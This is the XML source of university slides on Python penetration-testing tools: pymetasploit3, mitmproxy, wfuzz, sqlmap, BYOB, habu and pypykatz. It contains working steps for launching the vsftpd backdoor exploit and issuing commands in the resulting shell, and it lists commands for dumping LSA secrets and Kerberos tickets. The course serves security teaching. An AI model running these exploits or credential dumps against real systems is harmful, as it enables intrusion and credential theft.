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Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
      <p:regular r:id="rId37"/>
      <p:bold r:id="rId38"/>
      <p:italic r:id="rId39"/>
      <p:boldItalic r:id="rId40"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Impact" panose="020B0806030902050204" pitchFamily="3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13">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" pos="2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7"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="105" d="100"/>
          <a:sy n="105" d="100"/>
        </p:scale>
        <p:origin x="1840" y="200"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="1013"/>
        <p:guide pos="2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gns3.com/courses/101260/lectures/1477806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https://academy.gns3.com/courses/101260/lectures/1477806</a:t>
            </a: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ff0008f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ff0008f5_0_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58ff0008f5_0_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ff0008f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ff0008f5_0_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58ff0008f5_0_1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ff0008f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8ff0008f5_0_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58ff0008f5_0_1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ff0008f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ff0008f5_0_4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58ff0008f5_0_4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8ff0008f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8ff0008f5_0_2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58ff0008f5_0_2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8ff0008f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8ff0008f5_0_3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58ff0008f5_0_3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8ff0008f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8ff0008f5_0_4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8ff0008f5_0_4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ff0008f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ff0008f5_0_5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58ff0008f5_0_5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8ff0008f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8ff0008f5_0_6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58ff0008f5_0_6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8ff0008f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8ff0008f5_0_7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58ff0008f5_0_7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8ff0008f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8ff0008f5_0_7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58ff0008f5_0_7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ff0008f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ff0008f5_0_8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58ff0008f5_0_8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8ff0008f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8ff0008f5_0_9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58ff0008f5_0_9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9008f2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9008f299c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59008f299c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9008f299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9008f299c_0_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59008f299c_0_1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9008f2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9008f299c_0_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59008f299c_0_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9008f299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9008f299c_0_3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59008f299c_0_3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9008f299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9008f299c_0_4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59008f299c_0_4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9008f299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9008f299c_0_5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59008f299c_0_5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9008f299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9008f299c_0_6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59008f299c_0_6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d94b088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d94b0884_0_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d94b0884_0_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d94b088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d94b0884_0_1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56d94b0884_0_1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d94b088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d94b0884_0_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d94b0884_0_2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d94b088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d94b0884_0_3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56d94b0884_0_3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f0de699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f0de699f_0_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58f0de699f_0_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f0de699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f0de699f_0_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58f0de699f_0_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f0de699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f0de699f_0_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58f0de699f_0_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7183" y="6074953"/>
            <a:ext cx="1368555" cy="4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157185"/>
            <a:ext cx="9144000" cy="11745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l="11029" t="3370" r="30736" b="30681"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5740247" y="3967105"/>
            <a:ext cx="3403753" cy="28908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371603" y="1078552"/>
            <a:ext cx="7515071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371601" y="1786845"/>
            <a:ext cx="7515073" cy="146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810B"/>
              </a:buClr>
              <a:buSzPts val="5200"/>
              <a:buFont typeface="Impact"/>
              <a:buNone/>
              <a:defRPr sz="5200" cap="none">
                <a:solidFill>
                  <a:srgbClr val="B1810B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371600" y="3625729"/>
            <a:ext cx="7514523" cy="31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1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371600" y="3904451"/>
            <a:ext cx="7514524" cy="28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Arial"/>
              <a:buNone/>
              <a:defRPr sz="13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4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371599" y="4587631"/>
            <a:ext cx="7514523" cy="31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1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5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371599" y="4866353"/>
            <a:ext cx="7514524" cy="28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B1810B"/>
              </a:buClr>
              <a:buSzPts val="1300"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="1300" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="B1810B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Text Only">
  <p:cSld name="Alt Text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367130" y="1608139"/>
            <a:ext cx="8326019" cy="445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3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Text &amp; Picture">
  <p:cSld name="Alt Text &amp; Pictur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6713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3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4671604" y="1600373"/>
            <a:ext cx="4015195" cy="452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3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4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Two Content">
  <p:cSld name="Alt Two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36713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3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4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Comparison">
  <p:cSld name="Alt Comparis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3659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2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3659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5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6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in + Nodes">
  <p:cSld name="Plain + Node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157185"/>
            <a:ext cx="9144000" cy="11745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" descr="illustration - no words-04.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix amt="22000"/>
          </a:blip>
          <a:srcRect t="30531" r="29138"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4702848" y="0"/>
            <a:ext cx="4441151" cy="34757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367130" y="1608139"/>
            <a:ext cx="8326019" cy="445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3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 b="1" i="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157185"/>
            <a:ext cx="9144000" cy="11745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 l="11029" t="3370" r="30736" b="30681"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5740247" y="3967105"/>
            <a:ext cx="3403753" cy="289089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362779" y="1286037"/>
            <a:ext cx="7515071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810B"/>
              </a:buClr>
              <a:buSzPts val="5200"/>
              <a:buFont typeface="Impact"/>
              <a:buNone/>
              <a:defRPr sz="5200" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="B1810B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1362777" y="1994330"/>
            <a:ext cx="7515073" cy="146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mpact"/>
              <a:buNone/>
              <a:defRPr sz="32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7183" y="6074953"/>
            <a:ext cx="1368555" cy="4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(blank)">
  <p:cSld name="Text Only (blank)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67130" y="1608139"/>
            <a:ext cx="8326019" cy="445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icture">
  <p:cSld name="Text and Pictur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36713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>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4671604" y="1600373"/>
            <a:ext cx="4015195" cy="452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6713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3659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3659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5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6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="366713" y="879475"/>
            <a:ext cx="8326437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mpact"/>
              <a:buNone/>
              <a:defRPr sz="1800" b="1" i="0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0" y="-1"/>
            <a:ext cx="9144000" cy="13316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Info">
  <p:cSld name="Contact Inf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157185"/>
            <a:ext cx="9144000" cy="11745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l="11029" t="3370" r="30736" b="30681"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5740247" y="3967105"/>
            <a:ext cx="3403753" cy="289089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362777" y="1571854"/>
            <a:ext cx="7514523" cy="48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1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1362777" y="2055985"/>
            <a:ext cx="7514524" cy="27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Arial"/>
              <a:buNone/>
              <a:defRPr sz="13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1362777" y="2346708"/>
            <a:ext cx="7514524" cy="27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Arial"/>
              <a:buNone/>
              <a:defRPr sz="13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1362777" y="2637431"/>
            <a:ext cx="7514524" cy="27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B1810B"/>
              </a:buClr>
              <a:buSzPts val="1300"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="1300" b="1">
                <a:solidFill>
                  <a:srgbClr val="B1810B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7183" y="6074953"/>
            <a:ext cx="1368555" cy="4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222363" y="6074954"/>
            <a:ext cx="1368555" cy="4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126613"/>
            <a:ext cx="9143999" cy="74531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67130" y="1621330"/>
            <a:ext cx="8326020" cy="450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367130" y="1535528"/>
            <a:ext cx="8326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-1" y="0"/>
            <a:ext cx="9144000" cy="120316"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B181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886500" y="652005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22363" y="6074954"/>
            <a:ext cx="1368555" cy="4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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="126613"/>
            <a:ext cx="9143999" cy="74531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367130" y="1621330"/>
            <a:ext cx="8326020" cy="450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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367130" y="1535528"/>
            <a:ext cx="8326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-1" y="0"/>
            <a:ext cx="9144000" cy="120316"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B181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886500" y="652005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7">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="15547" t="26562" r="33359" b="59063"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="138323"/>
            <a:ext cx="9144000" cy="7411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sploit.help.rapid7.com/docs/rpc-ap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mproxy/mitmproxy/blob/master/examples/simple/add_header_class.p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testphp.vulnweb.com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testphp.vulnweb.com/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fuzz.readthedocs.io/en/latest/index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qlmap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hyperlink" Target="http://github.cm/sqlmapproject/sqlmap.gi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waredllc/byob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hyperlink" Target="https://github.com/malwaredllc/byob.gi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rtantier/habu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elsec/pypykat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derLabs/msfrpc/tree/master/python-msfrp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hyperlink" Target="https://github.com/SpiderLabs/msfrpc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McInerney/pymetasploit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707846" y="2530915"/>
            <a:ext cx="8178900" cy="14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810B"/>
              </a:buClr>
              <a:buSzPts val="5200"/>
              <a:buFont typeface="Impact"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CNIT 48101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1810B"/>
              </a:buClr>
              <a:buSzPts val="5200"/>
              <a:buFont typeface="Impact"/>
              <a:buNone/>
            </a:pP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07923" y="1078552"/>
            <a:ext cx="8178751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mpact"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Penetration Testing Tools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2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="3625729"/>
            <a:ext cx="7514523" cy="31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Garamond"/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3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="4087716"/>
            <a:ext cx="7691308" cy="68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Garamond"/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Topic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54275" y="1121900"/>
            <a:ext cx="10033800" cy="549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load metasploit console</a:t>
            </a:r>
            <a:endParaRPr sz="18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start the msfconsole and type:</a:t>
            </a:r>
            <a:endParaRPr sz="18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load msgrpc = abc123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In python 3.x,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pymetasploit3.msfrpc import MsfRpcClient #import the library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#create a new client username defaults to ‘msf’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client = MsfRpcClient(‘abc123’/&lt;password&gt;)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Setting Up PyMetasploit(3)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50" y="2269413"/>
            <a:ext cx="52387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217150" y="1031425"/>
            <a:ext cx="8748900" cy="556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Get a list of exploits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client.modules.exploits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Set an exploit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exploit = client.modules.use(‘exploit’, ‘/unix/ftp/vsftpd_234_backdoor’)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Get exploit options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exploit.options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Get missing required options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exploit.missing_required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Get description of exploit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print(exploit.description)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Using PyMetasploit(3)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159025" y="1031425"/>
            <a:ext cx="8789100" cy="56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Set option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exploit[‘RHOST’] = ‘172.168.14.145’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Retrieves a list of viable payloads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exploit.targetpayloads()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Execute exploit.If successful, is job_id is 1 otherwise the job_id is None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exploit.execute(payload=‘cmd/unix/interact’)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Get list of active exploit sessions.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client.sessions.list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Using PyMetasploit(3) (cont.)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xfrm>
            <a:off x="367125" y="1167125"/>
            <a:ext cx="8499300" cy="541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Accessing an exploited shell. Use the last command to view all active session id’s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shell=client.sessions.session(‘1’/&lt;session_id&gt;)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Sending a command to the shell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shell.write(‘whoami’)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Accessing shell output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print(shell.read())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Close the shell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shell.write(‘exit’)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Pymetasploit has a variety of other cool features and commands not covered in this presentation. For more info please review the source code. </a:t>
            </a:r>
            <a:endParaRPr sz="1800"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Using PyMetasploit(3) (cont.)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208100" y="1040475"/>
            <a:ext cx="8694600" cy="557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The Metasploit framework can be controlled through http through its RPC (Remote Procedure Call) client.</a:t>
            </a:r>
            <a:endParaRPr sz="24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Metasploit makes all it services available through callable API’s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Both python-msfrpc and pymetasploit3 used this to interface with the RPC client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Basically, all these libraries do, is provide ways to make these API calls in a user friendly and scriptable manner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metasploit rpc server can be started by typing in msfconsole:</a:t>
            </a:r>
            <a:endParaRPr sz="18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load msgrpc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The best way to understand how to use these libraries is to review the API documentation on metasploit’s website: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https://metasploit.help.rapid7.com/docs/rpc-api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Metasploit RPC client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body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367125" y="1103801"/>
            <a:ext cx="8325900" cy="496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MITM (Man in the Middle Proxy) is a powerful http proxy tool.</a:t>
            </a:r>
            <a:endParaRPr sz="18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Use it to monitor http traffic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Conduct man in the middle attacks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Http spoofing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Installation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pip3 install mitmproxy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Also comes as a command line tool and web application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Consists of two programs. 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mitmproxy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>: for starting and managing proxy sessions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mitmdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>: tcpdump like functionality for managing traffic from proxy sessions</a:t>
            </a:r>
            <a:endParaRPr sz="18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MITM Proxy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950" y="2026825"/>
            <a:ext cx="1451000" cy="14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244625" y="1013325"/>
            <a:ext cx="8712300" cy="556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 the terminal start mitmproxy</a:t>
            </a:r>
            <a:endParaRPr sz="18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mitmproxy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Configure your http proxy settings on your machine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This process is OS dependent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Navigate to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mitmproxy.it</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t> in a browser and click on the corresponding operating system to install a mitmproxy certificate. Your machine will have to be configured to trust certificates from its internal CA authority.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You should now be able to to decrypt any encrypted traffic sent to your client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Mitmproxy uses pydocs to give you more information about different modules from the command line. For example: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pydoc mitmproxy.http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Setting Up Mitmproxy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204250" y="1199400"/>
            <a:ext cx="8598900" cy="537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Most data from mitmproxy is pumped into Python as Flow objects. For example, HTTP data is encapsulated as a mitmproxy.http.HTTPFlow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There are also other types data classes that mitmproxy produces in such as layers and entry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Mitmproxy these data objects are passed in and made available for manipulation through built in even functions: Here is a list of some event functions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http_connect(self, flow: mitmproxy.http.HTTPFlow)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>: an http CONNECT request was received from remote host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tcp_start(self, flow: mitmproxy.http.TCPFlow):</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t> a tcp connection has started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tcp_end(self, flow: mitmproxy.http.TCPFlow): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>a tcp connection has ended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By editing these functions and editing the flow data, we can change the traffic on the fly.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Mitmproxy concepts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body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="162875" y="1040450"/>
            <a:ext cx="8721900" cy="56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This simple script injects form data from http traffic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We import the http module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mitmproxy import http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We want our code to run when mitmproxy reads a request from the client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def request(flow:http.HTTPFlow)-&gt;None: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We check if there is already a request in the form data, if there is we add a field to it. In this case, its “Mitchell” with a value of “rocks”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if flow.request.urlencoded_form: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flow.request.urlencoded_form[“mitchell”]= “rocks”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/>
              <a:t>If there’s no form, we just inject one.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flow.request.urlencoded_form=[ (“foo”,”bar”) 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Scripting with mitmproxy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body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="217325" y="1121900"/>
            <a:ext cx="8658300" cy="542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Rather than use mitmproxy in a script, you can also use mitmproxy addons. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1"/>
              <a:t>Addons</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t> are small modules of Python code that can be run through the mitmproxy console.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Addons are implemented as classes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mitmproxy also comes with the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-US" sz="1800"/>
              <a:t> library which contains a suite of useful functions such as logging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Addons also has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lang="en-US" sz="1800"/>
              <a:t>, configurable variables whose values will be made available to the program. They can be configured through the command line or through a configuration file.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Mitmproxy is a large library with lots of features that can't all be covered here. The best source of information is to read the source code and examples.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https://github.com/mitmproxy/mitmproxy/blob/master/examples/simple/add_header_class.py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Mitmproxy addons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261463" y="1136675"/>
            <a:ext cx="8363700" cy="53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This chapter overviews several Python penetration testing tools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Python has extensions to a lot of popular penetration testing frameworks.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l="21301" t="12728" r="17540" b="19058"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1382500" y="2782675"/>
            <a:ext cx="2945325" cy="354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437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/>
              <a:t>Intro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438" y="4899275"/>
            <a:ext cx="853450" cy="8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>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="240450" y="1110525"/>
            <a:ext cx="8635200" cy="552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mitmproxy import http, ctx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class AddHeader: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def load(self, loader):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loader.add_option(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name= “add_header”,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typesec = “Bool”,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default = False,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help = “add foo header”)	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def response(self, flow: http.HTTPFlow):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if ctx.options.add_header == True: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ctx.log.info(“adding header”)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flow.response.headers[“newheader”] = “foo”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addons(AddHeader())</a:t>
            </a:r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Mitmproxy addon example</a:t>
            </a:r>
            <a:endParaRPr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862" y="1153600"/>
            <a:ext cx="234025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828" y="2910350"/>
            <a:ext cx="326090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675" y="4677290"/>
            <a:ext cx="295163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8625" y="5932771"/>
            <a:ext cx="326100" cy="464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>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367125" y="1112850"/>
            <a:ext cx="8325900" cy="557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import the http module and ctx utility module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choose the load event to add our options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add the option add_header</a:t>
            </a:r>
            <a:endParaRPr/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it is of type Boolean</a:t>
            </a:r>
            <a:endParaRPr/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it’s default value is False</a:t>
            </a:r>
            <a:endParaRPr/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its description is “add foo header”</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="13716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mitmproxy reads a response it triggers our function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Check to see if our add headers option is True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true, print “adding header”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 a header with value “foo” to the response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function exports our module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run the function like this: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mitmproxy -s add_header.py --set add_header=True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mitmdump -s &lt;my program&gt; --set &lt;options&gt;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37" y="1198825"/>
            <a:ext cx="234025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28" y="1881550"/>
            <a:ext cx="326090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050" y="3559490"/>
            <a:ext cx="295163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588" y="4838021"/>
            <a:ext cx="326100" cy="464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body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="183775" y="1005975"/>
            <a:ext cx="8811900" cy="561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Python fuzzing library for web applications. Fuzzing is when an application is loaded with random or malformed inputs to see if any unexpected behavior arises. Fuzz</a:t>
            </a:r>
            <a:endParaRPr sz="24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fuzz forms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fuzz http headers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web pages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directories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Installation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pip3 install wfuzz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Also comes as a command line tool.</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="269" name="Google Shape;269;p37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Wfuzz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0" y="953525"/>
            <a:ext cx="9144000" cy="590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wfuzz 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p=wfuzz.get_payload(‘wordlists.txt’)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r in p.fuzz([hc=404],url=’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" u="sng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http://testphp.vulnweb.com/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FUZZ’):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print(r)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Alternatively,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p=wfuzz.FuzzSession(url=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" u="sng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http://testphp.vulnweb.com/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FUZZ’)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for r in s.fuzz([hc=404],payload=[‘file’,dict(fn=’wordlists.txt’)]):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print(r)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Alternatively again,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p=wfuzz.FuzzSession(‘-w wordlists.txt -hc 404 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" u="sng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http://testphp.vulnweb.com/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FUZZ)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for r in p.fuzz():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print(r)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2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="269988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Wfuzz example</a:t>
            </a:r>
            <a:endParaRPr/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9337" y="1047200"/>
            <a:ext cx="234025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0503" y="1501750"/>
            <a:ext cx="326090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8050" y="2471890"/>
            <a:ext cx="295163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1228" y="5468050"/>
            <a:ext cx="326090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5588" y="4229965"/>
            <a:ext cx="295163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09538" y="6084765"/>
            <a:ext cx="295163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82590" y="3415050"/>
            <a:ext cx="326090" cy="4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>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="183775" y="1005975"/>
            <a:ext cx="8811900" cy="567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import the Wfuzz library</a:t>
            </a:r>
            <a:endParaRPr sz="18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get the payload. In this case it’s a wordfile of values to fuzz and set it to p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set our target to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" u="sng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http://testphp.vulnweb.com/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 every value in the word file, we try to contact the target replacing the work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FUZZ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t> with a value from our word file and print the results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hide all http 404 responses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create a FuzzSession p with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" u="sng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http://testphp.vulnweb.com/</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr marL="18288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This is good when you want to conduct many different fuzz tests where a lot of options will stay the same.</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr marL="18288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 every value in the word file, we try to contact the target replacing the work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FUZZ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t> with a value from our word file and print the results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hide all http 404 responses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0" name="Google Shape;290;p39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Wfuzz example explained</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="291" name="Google Shape;2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612" y="1076225"/>
            <a:ext cx="234025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65" y="1975700"/>
            <a:ext cx="326090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025" y="2875165"/>
            <a:ext cx="295163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565" y="4353325"/>
            <a:ext cx="326090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025" y="5767915"/>
            <a:ext cx="295163" cy="4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173675" y="960075"/>
            <a:ext cx="8802600" cy="578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create a fuzz session and set it to p. This time, we input strings representing our command line arguments except without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wfuzz </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>argument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 every value in the word file, we try to contact the target replacing the work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FUZZ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t> with a value from our word file and print the results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hide all http 404 responses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Wfuzz also has a lot of other functionality that we won’t be covering. To learn more check out the docs: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https://wfuzz.readthedocs.io/en/latest/index.html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or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type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lang="en-US" sz="1800"/>
              <a:t> in the wfuzz console</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="302" name="Google Shape;302;p40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Wfuzz example explained (cont.)</a:t>
            </a:r>
            <a:endParaRPr/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28" y="1086275"/>
            <a:ext cx="326090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288" y="2118965"/>
            <a:ext cx="295163" cy="4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>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="252463" y="2799740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Other Tools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body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="164425" y="1034975"/>
            <a:ext cx="8715300" cy="556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Automatic command line SQL injection tool implemented in Python</a:t>
            </a:r>
            <a:endParaRPr sz="24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cli only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supports a wide variety of different databases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dump database tables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contains a wide variety of different injection attacks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http://sqlmap.org/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Installation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git clone --depth 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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http://github.cm/sqlmapproject/sqlmap.git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sqlmap-dev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190500" marR="190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2879D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SQLMap</a:t>
            </a:r>
            <a:endParaRPr/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650" y="5486550"/>
            <a:ext cx="31623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>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="203125" y="1093025"/>
            <a:ext cx="8763600" cy="562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Powerful Botnet Building framework implemented in Python</a:t>
            </a:r>
            <a:endParaRPr sz="18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Botnet slaves can load code without writing to disk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Botnet slaves have no dependencies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Load code remotely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Remotely update slaves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Extensible through the use of modules. Write your own modules for slaves to load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https://github.com/malwaredllc/byob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Installation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-US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https://github.com/malwaredllc/byob.git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cd byob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python3 setup.py install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Unfortunately, the documentation on this library is very poor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5" name="Google Shape;325;p43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Build Your Own Botnet</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="326" name="Google Shape;32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0875" y="3746998"/>
            <a:ext cx="1479050" cy="18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>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175800" y="1034975"/>
            <a:ext cx="8792400" cy="557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Basic network exploitation library in Python such as arp poisoning.</a:t>
            </a:r>
            <a:endParaRPr sz="24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Uses Scapy as a backend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Good for learning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CLI only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https://github.com/portantier/habu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Installation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pip3 install habu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3" name="Google Shape;333;p44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Habu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67125" y="1068400"/>
            <a:ext cx="8439900" cy="55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Python extension to Mimikatz</a:t>
            </a:r>
            <a:endParaRPr sz="24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Mimikatz is popular Windows exploitation tool used to dump passwords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https://github.com/skelsec/pypykatz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Install Pypykatz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pip3 install pypykatz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Pypykatz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25" y="3912675"/>
            <a:ext cx="2811300" cy="28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3350" y="4551949"/>
            <a:ext cx="1375601" cy="13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47950" y="1049925"/>
            <a:ext cx="8648100" cy="54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Pypykatz is command line only through the Python shell. Its also currently a work in progress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General Command Format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609600" marR="152400" lvl="0" indent="3048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pypykatz &lt;ouput options&gt; &lt;command&gt; &lt;subcommand (opt)&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1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&lt;output options&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t> :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&lt;flag&gt; -o &lt;file&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>or prints to stdout if left blank</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/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--json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>: json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--dmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>: minidump file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--kirbi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>: kerberos file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--ccache</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>: C/C++ cached output file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&lt;command&gt;: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>pypykatz command to run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&lt;subcommand&gt;:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t> command options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Pypykatz (cont.)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111150" y="951450"/>
            <a:ext cx="8921700" cy="546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Dump Live LSA secrets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US" sz="1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pypykatz live lsa</a:t>
            </a:r>
            <a:endParaRPr sz="1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</a:rPr>
              <a:t>Store Kerberos Tickets</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="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&gt;&gt;pypykatz.py -k &lt;output_dir&gt; minidump &lt;dumpfile&gt;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minidump command is used to parse .dmp files and has several options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457200" marR="152400" lvl="0" indent="-3429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24292E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Reads a single minidump file</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="152400" lvl="1" indent="-3429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US" sz="1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pypykatz.py minidump &lt;minidump file&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1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429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>
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Reads all .dmp files in a given folder</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="152400" lvl="1" indent="-3429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US" sz="1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pypykatz.py minidump &lt;folder_with_dumpfiles&gt; -d</a:t>
            </a:r>
            <a:endParaRPr sz="1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429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>
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Recursively looks through a folder for a .dmp files</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="152400" lvl="1" indent="-3429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US" sz="18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pypykatz.py minidump &lt;folder_with_folder_of_dumpfiles&gt; -d -r</a:t>
            </a:r>
